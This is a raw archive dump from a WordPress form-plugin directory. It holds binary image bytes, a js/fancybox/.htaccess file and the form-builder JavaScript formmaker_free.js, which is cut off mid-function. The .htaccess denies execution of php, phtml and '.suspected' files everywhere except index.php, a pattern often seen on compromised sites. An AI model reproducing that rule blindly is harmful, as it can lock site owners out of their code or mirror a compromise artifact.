-��I��/����"K��#n�����,r&���1U�	�*[�R�b��o	��Yu��=�!�		3,����DBD���$"$���dbdTRT424�����䔖�trt
LJL���,*,���\Z\<:<������ljl������|z|DFD���$&$���TVT464�����䜚�tvtLNL���,.,���\^\<><������lnl���pHD�L�ry@��	P�!l�FK�(vI�@ *�d���J,��E����C��**y�$$KBk_0
B"B"''.\-!,�3�'
!.gB+#0*�-.
'h��w+
�Y$(C-�-�v-)�)��v3
��
".����0����!��-��x�$K�8�Ⴠeq����CT��"�g8�@ǎ��X�S8��0�@I/<t,q�
g8�l��KXu�A!��(|p
j�v(p&ib���n~U��,o	��d5�k[�R���]!�		6,����DBD���$"$dbd������TRT424trt�����ܴ�����
LJL,*,\Z\<:<|z|������lnl�����윚���伺����DFD���$&$dfd���TVT464tvt��ܴ�����LNL,.,\^\<><|~|����@�pHlY&�r�
����E&�^Kb$�H��d��B�"u�E/a��`A�TJ�@sK0BzW1%�).B!!I	zVe-+n'1�(.D
.�B&�XY�.�C	'�Y-+-C&���v'!!!(22�h"���2
v6%�����0|�:1��>ؖ�0��"L 0"I�Ttp�b�a@@��
!.hT���
�`H�I���, P� �L�3�L����D5X�` &��Y&���&&�`���j��h��B�e���hE!P��D��,A!�		6,����DBD���$"$���dbd������424TRT���trt���
���LJL,*,���ljl���<:<�����\Z\���|~|������DFD$&$���dfd������464TVTtvt������LNL,.,���lnl���<><��̼���@�pH|�(%�r�8ń�TJ!,�$K�I�Y�B���HA�,�+�J���Z�XT�� OJ+I6(-a
,B1#m6.3
^3\]
,++"^13�3+3.D! "�hB+
��K1�" iD%3j+	C+��u6%�33+1�!�	5�&����2��2���-���BT �%�u�Q+��h�A%�!b<@PP�3ЈHF�r����Dh�qC�'.CG�t�@���YąXA�g�*����4^�"l�8p@�6��5͐�A���P����?�(��B�TR!�		5,����DBD���$"$���dbd������TRT424��Լ��tvt
���LJL���,*,���ljl���\Z\<:<������DFD���$&$���dfd������TVT464��ܼ��|~|���LNL���,.,���lnl���\^\<><���pHܰ*�r�����#DtK�G@{�b�I
0sTY(M�EK�ÁI�5<�l`sL#I544`SsP%P5.\4e*
+I�#1D
4+�0h51�i#�+4�C*1^Y*)
�c��*�v&�Ȕ��v5������v��*���i��C���Q���;#�=����b�<�*��!�Ԙ�„�(f�1"�
4h�pA�-P �@�a4, @CC�O�'@H����1 X@�J�H0b	���P)@��+jh� A8*i��jvË*�@��B\�x�$�	!�		6,����DBD���$"$���dfd���424���TRT���tvt�����
���,*,���lnl<:<\Z\LJL�����윞����|~|���DFD$&$���ljl464���TVT���|z|��������,.,���trt<><\^\�������@�pH�,�r�!%m��"d���!�@��HY��\�l�K��m��	�Ƹ,D8�Y\fL$,B!1QS	%B$.Bl^�].	f', 0

I�\$M�Z2	
)
i61!��K$�
#	�C,wOK0 �,�,^u�..w\�Xj-�-
0�\�Y
�-
�,�yu_��6%jL(�!�҆Q��!�a�C�@����	#��"&8!�B
#<(P��@p�BB�&�H@�"PS	2�A#������8Q���$p@1���T����e봐��Fի�6pxQP	3(
 DB:����Q� !�		5,����DBD���$"$dbd������424trt���TRT��ܴ��
������,*,ljl<:<|z|\Z\LNL��������伾����DFD���$&$dfd������464tvt���TVT��ܼ��������,.,lnl<><|~|\^\���pH��r�)=���
!��Y{l�������KJ�����Hxx���LFU6�^!1QS!oB,!BhI�H%1	&�IR%MWf!)B1RVe,�4!�D,GOX)&I��ǥ�	!�
$��r54'�
'4�����0��r&	�/}B/.e%33&�C%TlP����- ( 0�B��T8�@�+^\���!���C1fdH`�/
8�xB�*	�Xc�N�"F��P#̄K���,�А�@9NP���PP-q���ѡ����hA��گ5( S�ȉH�!�		6,����DBD���$"$dbd������TRT424trt���������
���LJL,*,ljl���\Z\<:<|z|��̬�����������DFD���$&$dfd������TVT464tvt���������LNL,.,lnl���\^\<><|~|����@�pH��r�)=��a%l>��i{l��#;\m+����8���wj�&����%�bQS%R%P!h6006�H[!33I(��%%D%+�3
|6�d3��U"$	d'3!w�--&o}G11��#��� ���-�&212�2&!�+!�!WB d".K%h8p��	(�@d��*h81!�>1�EH�a�!�0�1^�p�BJ2���1�R�c�M&X�h!ąwJ����
&��@�Л80P��	��h� ��#��老E]Kb� jAZ�a
(h��fo�!�		6,����DBD���$"$dbd������TRT424������trt���
LJL���,*,ljl���\Z\<:<���������|~|������DFD���$&$dfd������TVT464������tvt���LNL���,.,lnl���\^\<><����@�pH��r)[����%�K"�tx����H�a$R�ƒRኹ�H'�S�4�|96i)n%R%U%T6))
i!a%a�)��PW,2!R2C(�0fRbE&fF%�6�-!s6�%�  ��
4�4
��#�4�'2&�	�s2�WD!-f	-e� h��`32,̰�A�1
�X�`�!�J@�q��G^lL��"F�F�0cC�*&X��E DP�``�J�0T��
��0b
2Xx�@E�h4
�T'�&x&B�3����ylI�EMk�B	ϔ��!�� !�		6,����DBD���$"$dbd���������TRT424���trt���
���LJL���,*,ljl���\Z\<:<������|~|������DFD���$&$dfd���������TVT464tvt������LNL���,.,lnl���\^\<><����@�pH,iH�rY�D��L�!�K��I*�)a�@�g���̈́W䊹�9>��L�,_N64im
!%U%+B./i/* c1%|�..�!&0�Up�1C#�.fd!1�D
*fc%�6444es+�2*�*s6c!�1#��	�c��--
�s+���62f0``��#FP�R♀�lL��p�	-0�E�	iH��ЂX@(тB��[�L��
).`!���G)RD@q��!%�'

R�xp�‰�YP�HЀZ�'��wB�Q�thS��l��*�=pDZ��;js/fancybox/.htaccess000044400000000424152434416630010575 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>js/formmaker_free.js000060400004407612152434416630010524 0ustar00// Choices id.
j = 2;
var c;
var need_enable = true;
var a = new Array();
var count_of_fields_form = 7;
if (ajaxurl.indexOf("://") != -1) {
  var url_for_ajax = ajaxurl;
}
else {
  var url_for_ajax = location.protocol + '//' + location.host + ajaxurl;
}

function active_reset(val, id) {
	if (val) {
		document.getElementById(id+'_element_resetform_id_temp').style.display = "inline";
	}
	else {
		document.getElementById(id+'_element_resetform_id_temp').style.display = "none";
	}
}

function check_required() {
	alert('"Submit" and "Reset" buttons are disabled in back end.');
}

function isNumber(n) {
  return !isNaN(parseFloat(n)) && isFinite(n);
}
function change_field_name(id, x) {
	value = x.value;
	if (value == parseInt(value)) {
		alert('The name of the field cannot be a number.');
		x.value="";
		document.getElementById(id+'_elementform_id_temp').name='';
		document.getElementById(id+'_element_labelform_id_temp').innerHTML='';
		return;
	}
	if (value == id + "_elementform_id_temp") {
		alert('"Field Name" should differ from "Field Id".')
		x.value="";
	}
	else {
		document.getElementById(id+'_elementform_id_temp').name=value;
		document.getElementById(id+'_element_labelform_id_temp').innerHTML=value;
	}
}

function change_field_value(id, value) {
	document.getElementById(id+'_elementform_id_temp').value = value;
}

function chnage_icons_src(img, icon) {
  if (img.src.indexOf("hover") != -1) {
    img.src =  fmc_plugin_url+'/images/' + icon + ".png";
  }
  else {
    img.src =  fmc_plugin_url+'/images/' + icon + "_hover.png";
  }
}

function return_attributes(id) {
	attr_names = new Array();
	attr_value = new Array();
	var input = document.getElementById(id);
	if (input) {
		atr = input.attributes;
    for (i = 0; i < 30; i++) {
      if (atr[i]) {
        if (atr[i].name.indexOf("add_") == 0) {
          attr_names.push(atr[i].name.replace('add_', ''));
          attr_value.push(atr[i].value);
        }
      }
    }
	}
  return Array(attr_names, attr_value);
}

function refresh_attr(x, type) {
	switch(type) {
		case "type_text": {
			id_array = Array();
			id_array[0] = x + '_elementform_id_temp';
			break;
		}
    case "type_paypal_price": {
			id_array = Array();
			id_array[0] = x + '_element_dollarsform_id_temp';
			id_array[1] = x + '_element_centsform_id_temp';
			break;
		}
    case "type_star_rating": {
			id_array = Array();
			id_array[0] = x + '_elementform_id_temp';
			break;
		}

		case "type_scale_rating": {
			id_array = Array();
			id_array[0] = x + '_elementform_id_temp';
			break;
		}

		case "type_spinner": {
			id_array = Array();
			id_array[0] = x + '_elementform_id_temp';
			break;
		}

		case "type_slider": {
			id_array = Array();
			id_array[0] = x + '_elementform_id_temp';
			break;
		}

		case "type_range": {
			id_array = Array();
			id_array[0] = x + '_elementform_id_temp0';
			id_array[1] = x + '_elementform_id_temp1';
			break;
		}

		case "type_grading": {
			id_array = Array();
			id_array[0] = x + '_elementform_id_temp';
			break;
		}

		case "type_matrix": {
			id_array = Array();
			id_array[0] = x + '_elementform_id_temp';
			break;
		}

		case "type_name":	{
			id_array=Array();
			id_array[0]=x+'_element_firstform_id_temp';
			id_array[1]=x+'_element_lastform_id_temp';
			id_array[2]=x+'_element_titleform_id_temp';
			id_array[3]=x+'_element_middleform_id_temp';
			break;
		}
		
		case "type_address":
			
		{
			id_array=Array();
			id_array[0]=x+'_street1form_id_temp';
			id_array[1]=x+'_street2form_id_temp';
			id_array[2]=x+'_cityform_id_temp';
			id_array[3]=x+'_stateform_id_temp';
			id_array[4]=x+'_postalform_id_temp';
			id_array[5]=x+'_countryform_id_temp';
			break;
		}
		
		case "type_checkbox":
			
		{
			id_array=Array();
			for(z=0;z<50;z++)
				id_array[z]=x+'_elementform_id_temp'+z;
			break;
		}
		
		case "type_time":
			
		{
			id_array=Array();
			id_array[0]=x+'_hhform_id_temp';
			id_array[1]=x+'_mmform_id_temp';
			id_array[2]=x+'_ssform_id_temp';
			id_array[3]=x+'_am_pmform_id_temp';
			break;
		}
		case "type_date":
			
		{
			id_array=Array();
			id_array[0]=x+'_elementform_id_temp';
			id_array[1]=x+'_buttonform_id_temp';
			break;
		}
		
		case "type_date_fields":
			
		{
			id_array=Array();
			id_array[0]=x+'_dayform_id_temp';
			id_array[1]=x+'_monthform_id_temp';
			id_array[2]=x+'_yearform_id_temp';
			break;
		}
		
		case "type_captcha":
			
		{
			id_array=Array();
			id_array[0]='_wd_captchaform_id_temp';
			id_array[1]='_wd_captcha_inputform_id_temp';
			id_array[2]='_element_refreshform_id_temp';
			break;
		}
		
		case "type_recaptcha":
			
		{
			id_array=Array();
			id_array[0]='wd_recaptchaform_id_temp';
			break;
		}
		
		case "type_submit_reset":
			
		{
			id_array=Array();
			id_array[0]=x+'_element_submitform_id_temp';
			id_array[1]=x+'_element_resetform_id_temp';
			break;
		}
		
		case "type_page_break":
			
		{
			id_array=Array();
			id_array[0]='_div_between';
			break;
		}
	}
		
	for(q=0; q<id_array.length;q++)
	{
		id=id_array[q];
		var input=document.getElementById(id);
		if(input)
		{
			atr=input.attributes;
			for(i=0;i<30;i++)
				if(atr[i])
					{
						if(atr[i].name.indexOf("add_")==0)
						{
							input.removeAttribute(atr[i].name);
							i--;
						}
					}
				
			for(i=0;i<10;i++)
				if(document.getElementById("attr_name"+i))
				{
					try{input.setAttribute("add_"+document.getElementById("attr_name"+i).value, document.getElementById("attr_value"+i).value)}
					catch(err)
					{
						alert('Only letters, numbers, hyphens and underscores are allowed.');
					}
				}
		}
	}
}

function add_id_and_name(i,type)
{
	switch(type)
	{
		case 'type_text':
		{
			var	edit_main_table=document.getElementById("edit_main_table");
			
			var edit_main_tr0  = document.createElement('tr');
					edit_main_tr0.setAttribute("valing", "top");
					
			var edit_main_td0 = document.createElement('td');
				edit_main_td0.style.cssText = "padding-top:10px";
				
			var edit_main_td0_1 = document.createElement('td');
				edit_main_td0_1.style.cssText = "padding-top:10px";
				
			var br = document.createElement('br');
			var br1 = document.createElement('br');
			
			var field_id = document.createElement('label');
					field_id.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px;  margin-right:27px";
					field_id.innerHTML = "Field id ";
			
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("size", "50");
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("value", i+"_elementform_id_temp");
			
			var field_name = document.createElement('label');
					field_name.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px; margin-right:3px";
					field_name.innerHTML = "Field name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("size", "50");
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("value", i+"_elementform_id_temp");
				
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(br);
			edit_main_td0.appendChild(field_name);
			
			edit_main_td0_1.appendChild(field_id_text);
			edit_main_td0_1.appendChild(br1);
			edit_main_td0_1.appendChild(field_name_text);
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_tr0.appendChild(edit_main_td0_1);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);		
			break;
		}
	
		case 'type_address':
		{
			var	edit_main_table=document.getElementById("edit_main_table");
			
			var edit_main_tr0  = document.createElement('tr');
					edit_main_tr0.setAttribute("valing", "top");
					
			var edit_main_td0 = document.createElement('td');
				edit_main_td0.style.cssText = "padding-top:10px";
				edit_main_td0.setAttribute("colspan", "2");
				
			var br = document.createElement('br');
			
			var field_id = document.createElement('label');
					field_id.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px;  margin-right:27px";
					field_id.innerHTML = "Fields id ";
			
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("id", "field_id");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("style", "width:350px");
				field_id_text.setAttribute("value",  i+"_street1form_id_temp, "+i+"_street2form_id_temp, "+i+"_cityform_id_temp, "+i+"_stateform_id_temp, "+i+"_postalform_id_temp, "+i+"_countryform_id_temp");
			
			var field_name = document.createElement('label');
					field_name.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px; margin-right:3px";
					field_name.innerHTML = "Fields name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("id", "field_name");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("style", "width:350px");
				field_name_text.setAttribute("value", i+"_street1form_id_temp, "+i+"_street2form_id_temp, "+i+"_cityform_id_temp, "+i+"_stateform_id_temp, "+i+"_postalform_id_temp, "+i+"_countryform_id_temp");
				
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(field_id_text);
			edit_main_td0.appendChild(br);
			edit_main_td0.appendChild(field_name);
			edit_main_td0.appendChild(field_name_text);
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);		
			break;
		}
	
		case 'type_name':
		{
			var	edit_main_table=document.getElementById("edit_main_table");
			
			var edit_main_tr0  = document.createElement('tr');
					edit_main_tr0.setAttribute("valing", "top");
					
			var edit_main_td0 = document.createElement('td');
				edit_main_td0.style.cssText = "padding-top:10px";
				edit_main_td0.setAttribute("colspan", "2");
				
			var br = document.createElement('br');
			
			var field_id = document.createElement('label');
					field_id.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px;  margin-right:27px";
					field_id.innerHTML = "Fields id ";
			
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("id", "field_id");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("style", "width:350px");
				field_id_text.setAttribute("value",  i+"_element_firstform_id_temp, "+i+"_element_lastform_id_temp");
			
			var field_name = document.createElement('label');
					field_name.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px; margin-right:3px";
					field_name.innerHTML = "Fields name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("id", "field_name");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("style", "width:350px");
				field_name_text.setAttribute("value", i+"_element_firstform_id_temp, "+i+"_element_lastform_id_temp");
				
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(field_id_text);
			edit_main_td0.appendChild(br);
			edit_main_td0.appendChild(field_name);
			edit_main_td0.appendChild(field_name_text);
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);		
			break;
		}
	
		case 'type_radio':
		{
			var	edit_main_table=document.getElementById("edit_main_table");
			
			var edit_main_tr0  = document.createElement('tr');
					edit_main_tr0.setAttribute("valing", "top");
					
			var edit_main_td0 = document.createElement('td');
				edit_main_td0.style.cssText = "padding-top:10px";
				edit_main_td0.setAttribute("colspan", "2");
				
			var br = document.createElement('br');
			
			var field_id = document.createElement('label');
					field_id.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px;  margin-right:27px";
					field_id.innerHTML = "Fields id ";
			
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("id", "field_id");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("style", "width:350px");
				field_id_text.setAttribute("value",  '');
			
			var field_name = document.createElement('label');
					field_name.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px; margin-right:3px";
					field_name.innerHTML = "Fields name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("id", "field_name");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("style", "width:350px");
				field_name_text.setAttribute("value", '');
				
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(field_id_text);
			edit_main_td0.appendChild(br);
			edit_main_td0.appendChild(field_name);
			edit_main_td0.appendChild(field_name_text);
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);		
			refresh_id_name(i, type);
			break;
		}
	
		case 'type_checkbox':
		{
			var	edit_main_table=document.getElementById("edit_main_table");
			
			var edit_main_tr0  = document.createElement('tr');
					edit_main_tr0.setAttribute("valing", "top");
					
			var edit_main_td0 = document.createElement('td');
				edit_main_td0.style.cssText = "padding-top:10px";
				edit_main_td0.setAttribute("colspan", "2");
				
			var br = document.createElement('br');
			
			var field_id = document.createElement('label');
					field_id.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px;  margin-right:27px";
					field_id.innerHTML = "Fields id ";
			
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("id", "field_id");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("style", "width:350px");
				field_id_text.setAttribute("value",  '');
			
			var field_name = document.createElement('label');
					field_name.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px; margin-right:3px";
					field_name.innerHTML = "Fields name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("id", "field_name");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("style", "width:350px");
				field_name_text.setAttribute("value", '');
				
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(field_id_text);
			edit_main_td0.appendChild(br);
			edit_main_td0.appendChild(field_name);
			edit_main_td0.appendChild(field_name_text);
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);		
			refresh_id_name(i, type);
			break;
		}
	
		case 'type_time':
		{
			var	edit_main_table=document.getElementById("edit_main_table");
			
			var edit_main_tr0  = document.createElement('tr');
					edit_main_tr0.setAttribute("valing", "top");
					
			var edit_main_td0 = document.createElement('td');
				edit_main_td0.style.cssText = "padding-top:10px";
			var edit_main_td0_1 = document.createElement('td');
				edit_main_td0_1.style.cssText = "padding-top:10px";
				
			var br = document.createElement('br');
			var br1 = document.createElement('br');
			
			var field_id = document.createElement('label');
					field_id.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px;  margin-right:27px";
					field_id.innerHTML = "Fields id ";
			
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("size", "50");
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("id", "field_id");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("value", i+"_hhform_id_temp, "+i+"_mmform_id_temp, "+i+"_ssform_id_temp");
			
			var field_name = document.createElement('label');
					field_name.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px; margin-right:3px";
					field_name.innerHTML = "Fields name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("size", "50");
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("id", "field_name");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("value", i+"_hhform_id_temp, "+i+"_mmform_id_temp, "+i+"_ssform_id_temp");
				
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(br1);
			edit_main_td0.appendChild(field_name);
			edit_main_td0_1.appendChild(field_id_text);
			edit_main_td0_1.appendChild(br);
			edit_main_td0_1.appendChild(field_name_text);
			
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_tr0.appendChild(edit_main_td0_1);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);		
			break;
		}
	
		case 'type_date_fields':
		{
			var	edit_main_table=document.getElementById("edit_main_table");
			
			var edit_main_tr0  = document.createElement('tr');
					edit_main_tr0.setAttribute("valing", "top");
					
			var edit_main_td0 = document.createElement('td');
				edit_main_td0.style.cssText = "padding-top:10px";
				edit_main_td0.setAttribute("colspan", "2");
				
			var br = document.createElement('br');
			
			var field_id = document.createElement('label');
					field_id.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px;  margin-right:27px";
					field_id.innerHTML = "Fields id ";
			
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("size", "50");
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("id", "field_id");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("value", i+"_dayform_id_temp, "+i+"_monthform_id_temp, "+i+"_yearform_id_temp");
			
			var field_name = document.createElement('label');
					field_name.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px; margin-right:3px";
					field_name.innerHTML = "Fields name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("size", "50");
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("id", "field_name");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("value", i+"_dayform_id_temp, "+i+"_monthform_id_temp, "+i+"_yearform_id_temp");
				
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(field_id_text);
			edit_main_td0.appendChild(br);
			edit_main_td0.appendChild(field_name);
			edit_main_td0.appendChild(field_name_text);
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);		
			break;
		}
	
		case 'type_captcha':
		{
			var	edit_main_table=document.getElementById("edit_main_table");
			
			var edit_main_tr0  = document.createElement('tr');
					edit_main_tr0.setAttribute("valing", "top");
					
			var edit_main_td0 = document.createElement('td');
				edit_main_td0.style.cssText = "padding-top:10px";
				
			var edit_main_td0_1 = document.createElement('td');
				edit_main_td0_1.style.cssText = "padding-top:10px";
				
			var br = document.createElement('br');
			var br1 = document.createElement('br');
			
			var field_id = document.createElement('label');
					field_id.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px;  margin-right:27px";
					field_id.innerHTML = "Fields id ";
			
			
			var field_id_text = document.createElement('input');
				field_id_text.setAttribute("size", "50");
				field_id_text.setAttribute("type", "text");
				field_id_text.setAttribute("id", "field_id");
				field_id_text.setAttribute("disabled", "disabled");
				field_id_text.setAttribute("value", "wd_captcha_inputform_id_temp");
			
			var field_name = document.createElement('label');
					field_name.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px; margin-right:3px";
					field_name.innerHTML = "Fields name ";
			
			var field_name_text = document.createElement('input');
				field_name_text.setAttribute("size", "50");
				field_name_text.setAttribute("type", "text");
				field_name_text.setAttribute("id", "field_name");
				field_name_text.setAttribute("disabled", "disabled");
				field_name_text.setAttribute("value", "captcha_inputform_id_temp");
				
			edit_main_td0.appendChild(field_id);
			edit_main_td0.appendChild(br1);
			edit_main_td0.appendChild(field_name);
			edit_main_td0_1.appendChild(field_id_text);
			edit_main_td0_1.appendChild(br);
			edit_main_td0_1.appendChild(field_name_text);
			edit_main_tr0.appendChild(edit_main_td0);
			edit_main_tr0.appendChild(edit_main_td0_1);
			edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);		
			break;
		}
    case 'type_spinner': {
      var	edit_main_table = document.getElementById("edit_main_table");
      var edit_main_tr0  = document.createElement('tr');
      edit_main_tr0.setAttribute("valing", "top");
      var edit_main_td0 = document.createElement('td');
      edit_main_td0.style.cssText = "padding-top:10px";
      var edit_main_td0_1 = document.createElement('td');
      edit_main_td0_1.style.cssText = "padding-top:10px";
      var br = document.createElement('br');
      var br1 = document.createElement('br');
      var field_id = document.createElement('label');
      field_id.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px;  margin-right:27px";
      field_id.innerHTML = "Field id ";
      var field_id_text = document.createElement('input');
      field_id_text.setAttribute("size", "50");
      field_id_text.setAttribute("type", "text");
      field_id_text.setAttribute("disabled", "disabled");
      field_id_text.setAttribute("value", i+"_elementform_id_temp");
      var field_name = document.createElement('label');
      field_name.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px; margin-right:3px";
      field_name.innerHTML = "Field name ";
      var field_name_text = document.createElement('input');
      field_name_text.setAttribute("size", "50");
      field_name_text.setAttribute("type", "text");
      field_name_text.setAttribute("disabled", "disabled");
      field_name_text.setAttribute("value", i+"_elementform_id_temp");
      edit_main_td0.appendChild(field_id);
      edit_main_td0.appendChild(br);
      edit_main_td0.appendChild(field_name);
      edit_main_td0_1.appendChild(field_id_text);
      edit_main_td0_1.appendChild(br1);
      edit_main_td0_1.appendChild(field_name_text);
      edit_main_tr0.appendChild(edit_main_td0);
      edit_main_tr0.appendChild(edit_main_td0_1);
      edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);		
      break;

		}
		case 'type_slider': {
      var	edit_main_table=document.getElementById("edit_main_table");
      var edit_main_tr0  = document.createElement('tr');
      edit_main_tr0.setAttribute("valing", "top");
      var edit_main_td0 = document.createElement('td');
      edit_main_td0.style.cssText = "padding-top:10px";
      var edit_main_td0_1 = document.createElement('td');
      edit_main_td0_1.style.cssText = "padding-top:10px";
      var br = document.createElement('br');
      var br1 = document.createElement('br');
      var field_id = document.createElement('label');
      field_id.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px;  margin-right:27px";
      field_id.innerHTML = "Field id ";
      var field_id_text = document.createElement('input');
      field_id_text.setAttribute("size", "50");
      field_id_text.setAttribute("type", "text");
      field_id_text.setAttribute("disabled", "disabled");
      field_id_text.setAttribute("value", i+"_elementform_id_temp");
      var field_name = document.createElement('label');
      field_name.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px; margin-right:3px";
      field_name.innerHTML = "Field name ";
      var field_name_text = document.createElement('input');
      field_name_text.setAttribute("size", "50");
      field_name_text.setAttribute("type", "text");
      field_name_text.setAttribute("disabled", "disabled");
      field_name_text.setAttribute("value", i+"_elementform_id_temp");
      edit_main_td0.appendChild(field_id);
      edit_main_td0.appendChild(br);
      edit_main_td0.appendChild(field_name);
      edit_main_td0_1.appendChild(field_id_text);
      edit_main_td0_1.appendChild(br1);
      edit_main_td0_1.appendChild(field_name_text);
      edit_main_tr0.appendChild(edit_main_td0);
      edit_main_tr0.appendChild(edit_main_td0_1);
      edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);		
      break;

		}
		case 'type_range': {
      var	edit_main_table=document.getElementById("edit_main_table");
      var edit_main_tr0  = document.createElement('tr');
      edit_main_tr0.setAttribute("valing", "top");
      var edit_main_td0 = document.createElement('td');
      edit_main_td0.style.cssText = "padding-top:10px";
      edit_main_td0.setAttribute("colspan", "2");
      var br = document.createElement('br');
      var field_id = document.createElement('label');
      field_id.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px;  margin-right:27px";
      field_id.innerHTML = "Fields id ";
      var field_id_text = document.createElement('input');
      field_id_text.setAttribute("type", "text");
      field_id_text.setAttribute("id", "field_id");
      field_id_text.setAttribute("disabled", "disabled");
      field_id_text.setAttribute("style", "width:350px");
      field_id_text.setAttribute("value",  '');
      var field_name = document.createElement('label');
      field_name.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px; margin-right:3px";
      field_name.innerHTML = "Fields name ";
      var field_name_text = document.createElement('input');
      field_name_text.setAttribute("type", "text");
      field_name_text.setAttribute("id", "field_name");
      field_name_text.setAttribute("disabled", "disabled");
      field_name_text.setAttribute("style", "width:350px");
      field_name_text.setAttribute("value", '');
      edit_main_td0.appendChild(field_id);
      edit_main_td0.appendChild(field_id_text);
      edit_main_td0.appendChild(br);
      edit_main_td0.appendChild(field_name);
      edit_main_td0.appendChild(field_name_text);
      edit_main_tr0.appendChild(edit_main_td0);
      edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);		
      refresh_id_name(i, type);
      break;

		}
    case 'type_grading': {
	    var	edit_main_table=document.getElementById("edit_main_table");
      var edit_main_tr0  = document.createElement('tr');
      edit_main_tr0.setAttribute("valing", "top");
      var edit_main_td0 = document.createElement('td');
      edit_main_td0.style.cssText = "padding-top:10px";
      edit_main_td0.setAttribute("colspan", "2");
      var br = document.createElement('br');
      var field_id = document.createElement('label');
      field_id.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px;  margin-right:27px";
      field_id.innerHTML = "Fields id ";
      var field_id_text = document.createElement('input');
      field_id_text.setAttribute("type", "text");
      field_id_text.setAttribute("id", "field_id");
      field_id_text.setAttribute("disabled", "disabled");
